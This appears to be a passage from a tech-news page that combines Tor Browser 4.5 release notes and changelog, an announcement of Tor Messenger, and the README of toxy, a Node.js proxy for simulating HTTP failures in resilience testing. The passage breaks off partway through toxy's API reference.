    Figure 1: The new Tor Onion Menu


    Security Improvements

    On the security front, the most exciting news is the new Security Slider. The Security Slider provides user-friendly vulnerability surface reduction - as the security level is increased, browser features that were shown to have a high historical vulnerability count in the iSec Partners hardening study are progressively disabled. This feature is available from the Tor onion menu's "Privacy and Security Settings" choice.

    Figure 2: The new Security Slider

    Our Windows packages are now signed with a hardware signing token graciously donated by DigiCert. This means that Windows users should no longer be prompted about Tor Browser coming from an unknown source. Additionally, our automatic updates are now individually signed with an offline signing key. In both cases, these signatures can be reproducibly removed, so that builders can continue to verify that the packages they produce match the official build binaries.
    The 4.5 series also features a rewrite of the obfs2, obfs3, and ScrambleSuit transports in GoLang, as well as the introduction of the new obfs4 transport. The obfs4 transport provides additional DPI and probing resistance features which prevent automated scanning for Tor bridges. As long as they are not discovered via other mechanisms, fresh obfs4 bridge addresses will work in China today. Additionally, barring new attacks, private obfs4 addresses should continue to work indefinitely.

    Privacy Improvements

    On the privacy front, the 4.5 series improves on our pre-existing first party isolation implementation to prevent third party tracking. First party isolation provides the property that third party advertisements, "like buttons", or "mashup" content that is included on one site will at most only know about your activity on that site, and will not be able to match it to your activity while you are on any other site. In other words, with first party isolation, Facebook, Twitter, and Google+ can't track you around the entire web using their infamous like buttons.
    Specifically, in the 4.5 release, we now ensure that blob: URIs are scoped to the URL bar domain that created them, and the SharedWorker API has been disabled to prevent cross-site and third party communication. We also now make full use of Tor's circuit isolation to ensure that all requests for any third party content included by a site travel down the same Tor Circuit. This isolation also ensures that requests to the same third party site actually use separate Tor Circuits when the URL bar domain is different. This request isolation is enforced even when long-lived "HTTP Keep-Alive" connections are used.

    We have also improved our resolution and locale fingerprinting defenses, and we now disable the device sensor and video statistics APIs.

    New Search Provider

    Our default search provider has also been changed to Disconnect. Disconnect provides private Google search results to Tor users without Captchas or bans.

    Full Changelogs

    Here is the complete list of changes in the 4.5 series since 4.0:
    • All Platforms
      • Update Tor to 0.2.6.7 with additional patches:
        • Bug 15482: Reset timestamp_dirty each time a SOCKSAuth circuit is used
      • Update NoScript to 2.6.9.22
      • Update HTTPS-Everywhere to 5.0.3
        • Bug 15689: Resume building HTTPS-Everywhere from git tags
      • Update meek to 0.17
      • Include obfs4proxy 0.0.5
        • Use obfs4proxy for obfs2, obfs3, obfs4, and ScrambleSuit bridges
      • Pluggable Transport Dependency Updates:
        • Bug 15265: Switch go.net repo to golang.org/x/net
        • Bug 15448: Use golang 1.4.2 for meek and obs4proxy
      • Update Tor Launcher to 0.2.7.4. Changes since 0.2.7.0.2 in 4.0.8:
        • Bug 11879: Stop bootstrap if Cancel or Open Settings is clicked
        • Bug 13271: Display Bridge Configuration wizard pane before Proxy pane
        • Bug 13576: Don't strip "bridge" from the middle of bridge lines
        • Bug 13983: Directory search path fix for Tor Messanger+TorBirdy
        • Bug 14122: Hide logo if TOR_HIDE_BROWSER_LOGO set
        • Bug 14336: Fix navigation button display issues on some wizard panes
        • Bug 15657: Display the host:port of any connection faiures in bootstrap
        • Bug 15704: Do not enable network if wizard is opened
      • Update Torbutton to 1.9.2.2. Changes since 1.7.0.2 in 4.0.8:
        • Bug 3455: Use SOCKS user+pass to isolate all requests from the same url domain
        • Bug 5698: Use "Tor Browser" branding in "About Tor Browser" dialog
        • Bug 7255: Warn users about maximizing windows
        • Bug 8400: Prompt for restart if disk records are enabled/disabled.
        • Bug 8641: Create browser UI to indicate current tab's Tor circuit IPs
          • (Many Circuit UI issues were fixed during 4.5; see release changelogs for those).
        • Bug 9387: Security Slider 1.0
          • Include descriptions and tooltip hints for security levels
          • Notify users that the security slider exists
          • Make use of new SVG, jar, and MathML prefs
        • Bug 9442: Add New Circuit button to Torbutton menu
        • Bug 9906: Warn users before closing all windows and performing new identity.
        • Bug 10216: Add a pref to disable the local tor control port test
        • Bug 10280: Strings and pref for preventing plugin initialization.
        • Bug 11175: Remove "About Torbutton" from onion menu.
        • Bug 11236: Don't set omnibox order in Torbutton (to prevent translation)
        • Bug 11449: Fix new identity error if NoScript is not enabled
        • Bug 13019: Change locale spoofing pref to boolean
        • Bug 13079: Option to skip control port verification
        • Bug 13406: Stop directing users to download-easy.html.en on update
        • Bug 13650: Clip initial window height to 1000px
        • Bugs 13751+13900: Remove SafeCache cache isolation code in favor of C++ patch
        • Bug 13766: Set a 10 minute circuit lifespan for non-content requests
        • Bug 13835: Option to change default Tor Browser homepage
        • Bug 13998: Handle changes in NoScript 2.6.9.8+
        • Bug 14100: Option to hide NetworkSettings menuitem
        • Bug 14392: Don't steal input focus in about:tor search box
        • Bug 14429: Provide automatic window resizing, but disable for now
        • Bug 14448: Restore Torbutton menu operation on non-English localizations
        • Bug 14490: Use Disconnect search in about:tor search box
        • Bug 14630: Hide Torbutton's proxy settings tab.
        • Bug 14631: Improve profile access error msgs (strings for translation).
        • Bugs 14632+15334: Display Cookie Protections only if disk records are enabled
        • Bug 15085: Fix about:tor RTL text alignment problems
        • Bug 15460: Ensure FTP urls use content-window circuit isolation
        • Bug 15502: Wipe blob: URIs on New Identity
        • Bug 15533: Restore default security level when restoring defaults
        • Bug 15562: Bind SharedWorkers to thirdparty pref
      • Bug 3455: Patch Firefox SOCKS and proxy filters to allow user+pass isolation
      • Bug 4100: Raise HTTP Keep-Alive back to 115 second default
      • Bug 5698: Fix branding in "About Torbrowser" window
      • Bug 10280: Don't load any plugins into the address space by default
      • Bug 11236: Fix omnibox order for non-English builds
        • Also remove Amazon, eBay and bing; add Youtube and Twitter
      • Bug 11955: Backport HTTPS Certificate Pinning patches from Firefox 32
      • Bug 12430: Provide a preference to disable remote jar: urls
      • Bugs 12827+15794: Create preference to disable SVG images (for security slider)
      • Bug 13019: Prevent Javascript from leaking system locale
      • Bug 13379: Sign our MAR update files
      • Bug 13439: No canvas prompt for content callers
      • Bug 13548: Create preference to disable MathML (for security slider)
      • Bug 13586: Make meek use TLS session tickets (to look like stock Firefox).
      • Bug 13684: Backport Mozilla bug #1066190 (pinning issue fixed in Firefox 33)
      • Bug 13788: Fix broken meek in 4.5-alpha series
      • Bug 13875: Spoof window.devicePixelRatio to avoid DPI fingerprinting
      • Bug 13900: Remove 3rd party HTTP auth tokens via Firefox patch
      • Bug 14392: Make about:tor hide itself from the URL bar
      • Bug 14490: Make Disconnect the default omnibox search engine
      • Bug 14631: Improve startup error messages for filesystem permissions issues
      • Bugs 14716+13254: Fix issues with HTTP Auth usage and TLS connection info display
      • Bug 14937: Hard-code meek and flashproxy node fingerprints
      • Bug 15029: Don't prompt to include missing plugins
      • Bug 15406: Only include addons in incremental updates if they actually update
      • Bug 15411: Remove old (and unused) cacheDomain cache isolation mechanism
      • Bug 15502: Isolate blob: URI scope to URL domain; block WebWorker access
      • Bug 15562: Disable Javascript SharedWorkers due to third party tracking
      • Bug 15757: Disable Mozilla video statistics API extensions
      • Bug 15758: Disable Device Sensor APIs
    • Linux
      • Bug 12468: Only print/write log messages if launched with --debug
      • Bug 13375: Create a hybrid GUI/desktop/shell launcher wrapper
      • Bug 13717: Make sure we use the bash shell on Linux
      • Bug 15672: Provide desktop app registration+unregistration for Linux
      • Bug 15747: Improve start-tor-browser argument handling
    • Windows
      • Bug 3861: Begin signing Tor Browser for Windows the Windows way
      • Bug 10761: Fix instances of shutdown crashes
      • Bug 13169: Don't use /dev/random on Windows for SSP
      • Bug 14688: Create shortcuts to desktop and start menu by default (optional)
      • Bug 15201: Disable 'runas Administrator' codepaths in updater
      • Bug 15539: Make installer exe signatures reproducibly removable
    • Mac
      • Bug 10138: Switch to 64bit builds for MacOS
    Here is the list of changes since the last 4.5 alpha (4.5a5):

    • All Platforms
      • Update Tor to 0.2.6.7 with additional patches:
        • Bug 15482: Reset timestamp_dirty each time a SOCKSAuth circuit is used
      • Update NoScript to 2.6.9.22
      • Update HTTPS-Everywhere to 5.0.3
        • Bug 15689: Resume building HTTPS-Everywhere from git tags
      • Update meek to 0.17
      • Update obfs4proxy to 0.0.5
      • Update Tor Launcher to 0.2.7.4
        • Bug 15704: Do not enable network if wizard is opened
        • Bug 11879: Stop bootstrap if Cancel or Open Settings is clicked
        • Bug 13576: Don't strip "bridge" from the middle of bridge lines
        • Bug 15657: Display the host:port of any connection faiures in bootstrap
      • Update Torbutton to 1.9.2.2
        • Bug 15562: Bind SharedWorkers to thirdparty pref
        • Bug 15533: Restore default security level when restoring defaults
        • Bug 15510: Close Tor Circuit UI control port connections on New Identity
        • Bug 15472: Make node text black in circuit status UI
        • Bug 15502: Wipe blob URIs on New Identity
        • Bug 15795: Some security slider prefs do not trigger custom checkbox
        • Bug 14429: Disable automatic window resizing for now
      • Bug 4100: Raise HTTP Keep-Alive back to 115 second default
      • Bug 13875: Spoof window.devicePixelRatio to avoid DPI fingerprinting
      • Bug 15411: Remove old (and unused) cacheDomain cache isolation mechanism
      • Bugs 14716+13254: Fix issues with HTTP Auth usage and TLS connection info display
      • Bug 15502: Isolate blob URI scope to URL domain; block WebWorker access
      • Bug 15794: Crash on some pages with SVG images if SVG is disabled
      • Bug 15562: Disable Javascript SharedWorkers due to third party tracking
      • Bug 15757: Disable Mozilla video statistics API extensions
      • Bug 15758: Disable Device Sensor APIs
    • Linux
      • Bug 15747: Improve start-tor-browser argument handling
      • Bug 15672: Provide desktop app registration+unregistration for Linux
    • Windows
      • Bug 15539: Make installer exe signatures reproducibly removable
      • Bug 10761: Fix instances of shutdown crashes  


    Download Tor Browser 4.5

    Tor Messenger - Chat over Tor, Easily

    Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enables Off-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages.

    What it isn't...

    Tor Messenger builds on the networks you are familiar with, so that you can continue communicating in a way your contacts are willing and able to do. This has traditionally been in a client-server model, meaning that your metadata (specifically the relationships between contacts) can be logged by the server. However, your route to the server will be hidden because you are communicating over Tor.
    We are also excited about systems like Pond and Ricochet, which try to solve this problem, and would encourage you to look at their designs and use them too.

    Why Instantbird?

    We considered a number of messaging clients: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice -- its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users.

    Instructions

    • On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop
    • On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.
    • On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory.
    • Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended.

    Toxy - Hackable Http Proxy To Simulate Server Failure Scenarios And Network Conditions


    Toxy is a fully programmatic and hackable HTTP proxy to simulate server failure scenarios and unexpected network conditions , built for node.js / io.js .

    It was mainly designed for fuzzing/evil testing purposes, when toxy becomes particularly useful to cover fault tolerance and resiliency capabilities of a system, especially in disruption-tolerant networks and service-oriented architectures, where toxy may act as MitM proxy among services.

    toxy allows you to plug in poisons, optionally filtered by rules, which essentially can intercept and alter the HTTP flow as you need, performing multiple evil actions in the middle of that process, such as limiting the bandwidth, delaying TCP packets, injecting network jitter latency or replying with a custom error or status code. It operates only at L7 (application level).

    toxy can be fluently used programmatically or via HTTP API . It was built on top of rocky , a full-featured middleware-oriented HTTP proxy, and it's also pluggable in connect / express as standard middleware.

    Requires node.js +0.12 or io.js +1.6

    Features
    • Full-featured HTTP/S proxy (backed by rocky and http-proxy )
    • Hackable and elegant programmatic API (inspired on connect/express)
    • Admin HTTP API for external management and dynamic configuration
    • Featured built-in router with nested configuration
    • Hierarchical and composable poisoning with rule based filtering
    • Hierarchical middleware layer (both global and route scopes)
    • Easily augmentable via middleware (based on connect/express middleware)
    • Supports both incoming and outgoing traffic poisoning
    • Built-in poisons (bandwidth, error, abort, latency, slow read...)
    • Rule-based poisoning (probabilistic, HTTP method, headers, body...)
    • Supports third-party poisons and rules
    • Built-in balancer and traffic interceptor via middleware
    • Inherits API and features from rocky
    • Compatible with connect/express (and most of their middleware)
    • Able to run as standalone HTTP proxy

    Introduction

    Why toxy?
    There're some other similar solutions like toxy in the market, but most of them do not provide a proper programmatic control and usually are not easy to hack, configure or are directly closed to extensibility.
    Furthermore, the majority of the those solutions only operates at TCP L3 level stack instead of providing high-level abstractions to cover common requirements in the specific domain and nature of the HTTP L7 protocol, like toxy tries to provide
    toxy brings a powerful hackable and extensible solution with a convenient abstraction, but without losing a proper low-level interface capabilities to deal with HTTP protocol primitives easily.
    toxy was designed based on the rules of composition, simplicity and extensibility. Via its built-in hierarchical domain specific middleware layer you can easily augment toxy features to your own needs.

    Concepts
    toxy introduces two directives: poisons and rules.
    Poisons are the specific logic which infects an incoming or outgoing HTTP transaction (e.g: injecting a latency, replying with an error). One HTTP transaction can be poisoned by one or multiple poisons, and those poisons can be also configured to infect both global or route level traffic.
    Rules are a kind of match validation filters that inspects an HTTP request/response in order to determine, given a certain rules, if the HTTP transaction should be poisioned or not (e.g: if headers matches, query params, method, body...). Rules can be reused and applied to both incoming and outgoing traffic flows, including different scopes: global, route or poison level.

    How it works
    ↓  ( Incoming request )  ↓
    ↓          |||           ↓
    ↓    +-------------+     ↓
    ↓    | Toxy Router |     ↓ -> Match the incoming request
    ↓    +-------------+     ↓
    ↓          |||           ↓
    ↓ +--------------------+ ↓
    ↓ |   Incoming phase   | ↓ -> The proxy receives the request from the client
    ↓ |~~~~~~~~~~~~~~~~~~~~| ↓
    ↓ |  ----------------  | ↓
    ↓ |  |  Exec Rules  |  | ↓ -> Apply configured rules for the incoming request
    ↓ |  ----------------  | ↓
    ↓ |        |||         | ↓
    ↓ |  ----------------  | ↓
    ↓ |  | Exec Poisons |  | ↓ -> If all rules passed, then poison the HTTP flow
    ↓ |  ----------------  | ↓
    ↓ +~~~~~~~~~~~~~~~~~~~~+ ↓
    ↓        /      \        ↓
    ↓        \      /        ↓
    ↓ +--------------------+ ↓
    ↓ |  HTTP dispatcher   | ↓ -> Forward the HTTP traffic to the target server, either poisoned or not
    ↓ +--------------------+ ↓
    ↓        /      \        ↓
    ↓        \      /        ↓
    ↓ +--------------------+ ↓
    ↓ |   Outgoing phase   | ↓ -> Receives response from target server
    ↓ |~~~~~~~~~~~~~~~~~~~~| ↓
    ↓ |  ----------------  | ↓
    ↓ |  |  Exec Rules  |  | ↓ -> Apply configured rules for the outgoing request
    ↓ |  ----------------  | ↓
    ↓ |        |||         | ↓
    ↓ |  ----------------  | ↓
    ↓ |  | Exec Poisons |  | ↓ -> If all rules passed, then poison the HTTP flow before send it to the client
    ↓ |  ----------------  | ↓
    ↓ +~~~~~~~~~~~~~~~~~~~~+ ↓
    ↓          |||           ↓
    ↓ ( Send to the client ) ↓ -> Finally, send the request to the client, either poisoned or not
    

    Usage

    Installation
    npm install toxy
    

    Examples
    See examples directory for more use cases.
    var toxy = require('toxy')
    var poisons = toxy.poisons
    var rules = toxy.rules
    
    // Create a new toxy proxy
    var proxy = toxy()
    
    // Default server to forward incoming traffic
    proxy
      .forward('http://httpbin.org')
    
    // Register global poisons and rules
    proxy
      .poison(poisons.latency({ jitter: 500 }))
      .rule(rules.probability(25))
    
    // Register multiple routes
    proxy
      .get('/download/*')
      .forward('http://files.myserver.net')
      .poison(poisons.bandwidth({ bps: 1024 }))
      .withRule(rules.headers({'Authorization': /^Bearer (.*)$/i }))
    
    // Infect outgoing traffic only (after the server replied properly)
    proxy
      .get('/image/*')
      .outgoingPoison(poisons.bandwidth({ bps: 512 }))
      .withRule(rules.method('GET'))
      .withRule(rules.timeThreshold({ duration: 1000, threshold: 1000 * 10 }))
      .withRule(rules.responseStatus({ range: [ 200, 400 ] }))
    
    proxy
      .all('/api/*')
      .poison(poisons.rateLimit({ limit: 10, threshold: 1000 }))
      .withRule(rules.method(['POST', 'PUT', 'DELETE']))
      // And use a different more permissive poison for GET requests
      .poison(poisons.rateLimit({ limit: 50, threshold: 1000 }))
      .withRule(rules.method('GET'))
    
    // Handle the rest of the traffic
    proxy
      .all('/*')
      .poison(poisons.slowClose({ delay: 1000 }))
      .poison(poisons.slowRead({ bps: 128 }))
      .withRule(rules.probability(50))
    
    proxy.listen(3000)
    console.log('Server listening on port:', 3000)
    console.log('Test it:', 'http://localhost:3000/image/jpeg')

    Poisons
    Poisons host specific logic which intercepts and mutates, wraps, modify and/or cancel an HTTP transaction in the proxy server. Poisons can be applied to incoming or outgoing, or even both traffic flows.
    Poisons can be composed and reused for different HTTP scenarios. They are executed in FIFO order and asynchronously.

    Poisoning scopes
    toxy has a hierarchical design based on two different scopes: global and route .
    Global scope points to all the incoming HTTP traffic received by the proxy server, regardless of the HTTP method or path.
    Route scope points to any incoming traffic which matches with a specific HTTP verb and URI path.
    Poisons can be plugged to both scopes, meaning you can operate with better accuracy and restrict the scope of the poisoning, for instance, you might wanna apply a bandwidth limit poisoning only to a certain routes, such as /download or /images .
    See routes.js for a featured example.

    Poisoning phases
    Poisons can be plugged to incoming or outgoing traffic flows, or even both.
    Incoming poisoning is applied when the traffic has been received by proxy but it has not been forwarded to the target server yet.
    Outgoing poisoning refers to the traffic that has been forwarded to the target server and when proxy recieves the response from it, but that response has not been sent to the client yet.
    This means, essentially, that you can plug in your poisons to infect the HTTP traffic before or after the request is forwarded to the target HTTP server or sent to the client.
    This allows you apply a better and more accurated poisoning based on the request or server response. For instance, given the nature of some poisons, like inject error , you may want to enable it according to the target server response (e.g: some header is present or not).
    See poison-phases.js for a featured example.

    Built-in poisons

    Latency
    Name latency
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Infects the HTTP flow injecting a latency jitter in the response
    Arguments :
    • options object
      • jitter number - Jitter value in miliseconds
      • max number - Random jitter maximum value
      • min number - Random jitter minimum value
    toxy.poison(toxy.poisons.latency({ jitter: 1000 }))
    // Or alternatively using a random value
    toxy.poison(toxy.poisons.latency({ max: 1000, min: 100 }))

    Inject response
    Name inject
    Poisoning Phase incoming / outgoing
    Reaches the server false (only as incoming poison)
    Injects a custom response, intercepting the request before sending it to the target server. Useful to inject errors originated in the server.
    Arguments :
    • options object
      • code number - Response HTTP status code. Default 500
      • headers object - Optional headers to send
      • body mixed - Optional body data to send. It can be a buffer or string
      • encoding string - Body encoding. Default to utf8
    toxy.poison(toxy.poisons.inject({
      code: 503,
      body: '{"error": "toxy injected error"}',
      headers: {'Content-Type': 'application/json'}
    }))

    Bandwidth
    Name bandwidth
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Limits the amount of bytes sent over the network in outgoing HTTP traffic for a specific time frame.
    This poison is basically an alias to throttle.
    Arguments :
    • options object
      • bytes number - Amount of chunk of bytes to send. Default 1024
      • threshold number - Packets time frame in miliseconds. Default 1000
    toxy.poison(toxy.poisons.bandwidth({ bytes: 512 }))

    Rate limit
    Name rateLimit
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Limits the amount of requests received by the proxy in a specific threshold time frame. Designed to test API limits. Exposes typical X-RateLimit-* headers.
    Note that this is very simple rate limit implementation, indeed limits are stored in-memory, therefore are completely volalite. There're a bunch of featured and consistent rate limiter implementations in npm that you can plug in as poison. You might be also interested in token bucket algorithm.
    Arguments :
    • options object
      • limit number - Total amount of requests. Default to 10
      • threshold number - Limit time frame in miliseconds. Default to 1000
      • message string - Optional error message when limit is reached.
      • code number - HTTP status code when limit is reached. Default to 429 .
    toxy.poison(toxy.poisons.rateLimit({ limit: 5, threshold: 10 * 1000 }))

    Slow read
    Name rateLimit
    Poisoning Phase incoming
    Reaches the server true
    Reads incoming payload data packets slowly. Only valid for non-GET request.
    Arguments :
    • options object
      • chunk number - Packet chunk size in bytes. Default to 1024
      • threshold number - Limit threshold time frame in miliseconds. Default to 1000
    toxy.poison(toxy.poisons.slowRead({ chunk: 2048, threshold: 1000 }))

    Slow open
    Name: slowOpen
    Name slowOpen
    Poisoning Phase incoming
    Reaches the server true
    Delays the HTTP connection ready state.
    Arguments :
    • options object
      • delay number - Delay connection in miliseconds. Default to 1000
    toxy.poison(toxy.poisons.slowOpen({ delay: 2000 }))

    Slow close
    Name slowClose
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Delays the HTTP connection close signal (EOF).
    Arguments :
    • options object
      • delay number - Delay time in miliseconds. Default to 1000
    toxy.poison(toxy.poisons.slowClose({ delay: 2000 }))

    Throttle
    Name throttle
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Restricts the amount of packets sent over the network in a specific threshold time frame.
    Arguments :
    • options object
      • chunk number - Packet chunk size in bytes. Default to 1024
      • delay object - Data chunk delay time frame in miliseconds. Default to 100
    toxy.poison(toxy.poisons.throttle({ chunk: 2048, threshold: 1000 }))

    Abort connection
    Name abort
    Poisoning Phase incoming / outgoing
    Reaches the server false (only as incoming poison)
    Aborts the TCP connection. From the low-level perspective, this will destroy the socket on the server, operating only at TCP level without sending any specific HTTP application level data.
    Arguments :
    • options object
      • delay number - Aborts TCP connection after waiting the given miliseconds. Default to 0
      • next boolean - If true , the connection will be aborted if the target server takes more than the delay param time to reply. Default to false
      • error Error - Custom internal node.js error to use when destroying the socket. Default to null
    // Basic connection abort
    toxy.poison(toxy.poisons.abort())
    // Abort after a delay
    toxy.poison(toxy.poisons.abort(1000))
    // In this case, the socket will be closed if
    // the target server takes more than
    // 2 seconds to respond
    toxy.poison(toxy.poisons.abort({ delay: 2000, next: true }))

    Timeout
    Name timout
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Defines a response timeout. Useful when forward to potentially slow servers.
    Arguments :
    • miliseconds number - Timeout limit in miliseconds
    toxy.poison(toxy.poisons.timeout(5000))

    How to write poisons
    Poisons are implemented as standalone middleware (like in connect/express).
    Here's a simple example of a server latency poison:
    var toxy = require('toxy')
    
    function customLatency(delay) {
      /**
       * We name the function since toxy uses it as identifier to get/disable/remove it in the future
       */
      return function customLatency(req, res, next) {
        var timeout = setTimeout(clean, delay)
        req.once('close', onClose)
    
        function onClose() {
          clearTimeout(timeout)
          next('client connection closed')
        }
    
        function clean() {
          req.removeListener('close', onClose)
          next()
        }
      }
    }
    
    var proxy = toxy()
    
    // Register and enable the poison
    proxy
      .get('/foo')
      .poison(customLatency(2000))
    You can optionally extend the build-in poisons with your own poisons:
    toxy.addPoison(customLatency)
    
    // Then you can use it as a built-in poison
    proxy
      .get('/foo')
      .poison(toxy.poisons.customLatency)
    For featured real example, take a look to the built-in poisons implementation.

    Rules
    Rules are simple validation filters which inspects an incoming or outgoing HTTP traffic in order to determine, given a certain rules (e.g: matches the method, headers, query params, body...), if the current HTTP transaction should be poisoned or not, based on the resolution value of the rule.
    Rules are useful to compose, decouple and reuse logic among different scenarios of poisoning. Rules can be applied to global, route or even poison scope, and it also applies to both phases of poisoning .
    Rules are executed in FIFO order. Their evaluation logic is equivalent to Array#every() in JavaScript: all the rules must pass in order to proceed with the poisoning.

    Built-in rules

    Probability
    Name probability
    Poison Phase incoming / outgoing
    Enables the rule by a random probabilistic. Useful for random poisoning.
    Arguments :
    • percentage number - Percentage of filtering. Default 50
    var rule = toxy.rules.probability(85)
    toxy.rule(rule)

    Time threshold
    Name timeThreshold
    Poison Phase incoming / outgoing
    Simple rule to enable poisons based on a specific time threshold and duration. For instance, you can enable a certain poisons during a specific amount of time (e.g: 1 second) within a time threshold (e.g: 1 minute).
    Arguments :
    • options object
      • duration number - Enable time inverval in miliseconds. Default to 1000
      • threshold number - Time threshold in miliseconds to wait before re-enable the poisoning. Default to 10000
    // Enable the poisoning only 100 miliseconds per each 10 seconds
    proxy.rule(toxy.rules.timeThreshold(100))
    // Enable poisoning during 1 second every minute
    proxy.rule(toxy.rules.timeThreshold({ duration: 1000, period: 1000 * 60 }))

    Method
    Name method
    Poison Phase incoming / outgoing
    Filters by HTTP method.
    Arguments :
    • method string|array - Method or methods to filter.
    var method = toxy.rules.method(['GET', 'POST'])
    toxy.rule(method)

    Content Type
    Filters by content type header. It should be present
    Arguments :
    • value string|regexp - Header value to match.
    var rule = toxy.rules.contentType('application/json')
    toxy.rule(rule)

    Headers
    Name headers
    Poison Phase incoming / outgoing
    Filter by request headers.
    Arguments :
    • headers object - Headers to match by key-value pair. value can be a string, regexp, boolean or function(headerValue, headerName) => boolean
    var matchHeaders = {
      'content-type': /^application/\json/i,
      'server': true, // meaning it should be present,
      'accept': function (value, key) {
        return value.indexOf('text') !== -1
      }
    }
    
    var rule = toxy.rules.headers(matchHeaders)
    toxy.rule(rule)

    Response headers
    Name responseHeaders
    Poison Phase outgoing
    Filter by response headers from target server. Same as headers rule, but evaluating the outgoing request.
    Arguments :
    • headers object - Headers to match by key-value pair. value can be a string , regexp , boolean or function(headerValue, headerName) => boolean
    var matchHeaders = {
      'content-type': /^application/\json/i,
      'server': true, // meaning it should be present,
      'accept': function (value, key) {
        return value.indexOf('text') !== -1
      }
    }
    
    var rule = toxy.rules.responseHeaders(matchHeaders)
    toxy.rule(rule)

    Body
    Name body
    Poison Phase incoming / outgoing
    Match incoming body payload by a given string , regexp or custom filter function .
    This rule is pretty simple, so for complex body matching (e.g: validating against a JSON schema) you should probably write your own rule.
    Arguments :
    • match string|regexp|function - Body content to match
    • limit string - Optional. Body limit in human size. E.g: 5mb
    • encoding string - Body encoding. Default to utf8
    • length number - Body length. Default taken from Content-Length header
    var rule = toxy.rules.body('"hello":"world"')
    toxy.rule(rule)
    
    // Or using a filter function returning a boolean
    var rule = toxy.rules.body(function contains(body) {
      return body.indexOf('hello') !== -1
    })
    toxy.rule(rule)

    Response body
    Name responseBody
    Poison Phase outgoing
    Match outgoing body payload by a given string , regexp or custom filter function .
    Arguments :
    • match string|regexp|function - Body content to match
    • encoding string - Body encoding. Default to utf8
    • length number - Body length. Default taken from Content-Length header
    var rule = toxy.rules.responseBody('"hello":"world"')
    toxy.rule(rule)
    
    // Or using a filter function returning a boolean
    var rule = toxy.rules.responseBody(function contains(body) {
      return body.indexOf('hello') !== -1
    })
    toxy.rule(rule)

    Response status
    Name responseStatus
    Poison Phase outgoing
    Evaluates the response status from the target server. Only applicable to outgoing poisons.
    Arguments :
    • range array - Pair of status code range to match. Default [200, 300] .
    • lower number - Compare status as lower than operation. Default to null .
    • higher number - Compare status as higher than operation. Default to null .
    • value number - Status code to match using a strict equality comparison. Default null .
    • include array - Unordered list of status codes to match. Useful to specify custom status. Default null
    // Strict evaluation of the status code
    toxy.rule(toxy.rules.responseBody(200))
    // Using a range of valid status
    toxy.rule(toxy.rules.responseBody([200, 204]))
    // Using relational comparison
    toxy.rule(toxy.rules.responseBody({ higher: 199, lower: 400 }))
    // Custom unordered status code to match
    toxy.rule(toxy.rules.responseBody({ include: [200, 204, 400, 404] }))

    Third-party rules
    List of available third-party rules provided by the community. PR are welcome.
    • IP - Enable/disable poisons based on the client IP address (supports CIDR, subnets, ranges...).

    How to write rules
    Rules are simple middleware functions that resolve asyncronously with a boolean value to determine if a given HTTP transaction should be ignored when poisoning.
    Your rule must resolve with a boolean param calling the next(err, shouldIgnore) function in the middleware, passing a true value if the rule has not matches and should not apply the poisoning, and therefore continuing with the next middleware stack.
    Here's an example of a simple rule matching the HTTP method to determine if:
    var toxy = require('toxy')
    
    function customMethodRule(matchMethod) {
      /**
       * We name the function since it's used by toxy to identify the rule to get/disable/remove it in the future
       */
      return function customMethodRule(req, res, next) {
        var shouldIgnore = req.method !== matchMethod
        next(null, shouldIgnore)
      }
    }
    
    var proxy = toxy()
    
    // Register and enable the rule
    proxy
      .get('/foo')
      .rule(customMethodRule('GET'))
      .poison(/* ... */)
    You can optionally extend the build-in rules with your own rules:
    toxy.addRule(customMethodRule)
    
    // Then you can use it as a built-in poison
    proxy
      .get('/foo')
      .rules(toxy.rules.customMethodRule)
    For featured real examples, take a look to the built-in rules implementation

    Programmatic API
    toxy API is completely built on top the rocky API . In other words, you can use any of the methods, features and middleware layer natively provided by rocky .

    toxy([ options ])
    Create a new toxy proxy.
    For supported options , please see rocky documentation
    var toxy = require('toxy')
    
    toxy({ forward: 'http://server.net', timeout: 30000 })
    
    toxy
      .get('/foo')
      .poison(toxy.poisons.latency(1000))
      .withRule(toxy.rules.contentType('json'))
      .forward('http://foo.server')
    
    toxy
      .post('/bar')
      .poison(toxy.poisons.bandwidth({ bps: 1024 }))
      .withRule(toxy.rules.probability(50))
      .forward('http://bar.server')
    
    toxy
      .post('/boo')
      .outgoingPoison(toxy.poisons.bandwidth({ bps: 1024 }))
      .withRule(toxy.rules.method('GET'))
      .forward('http://boo.server')
    
    toxy.all('/*')
    
    toxy.listen(3000)

    toxy#get(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for GET method.

    toxy#post(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for POST method.

    toxy#put(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for PUT method.

    toxy#patch(path, [ middleware... ])
    Return: ToxyRoute

    toxy#delete(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for DELETE method.

    toxy#head(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for HEAD method.

    toxy#all(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for any method.

    toxy#poisons => Object
    Exposes a map with the built-in poisons. Prototype alias to toxy.poisons

    toxy#rules => Object
    Exposes a map with the built-in poisons. Prototype alias to toxy.rules

    toxy#forward(url)
    Define a URL to forward the incoming traffic received by the proxy.

    toxy#balance(urls)
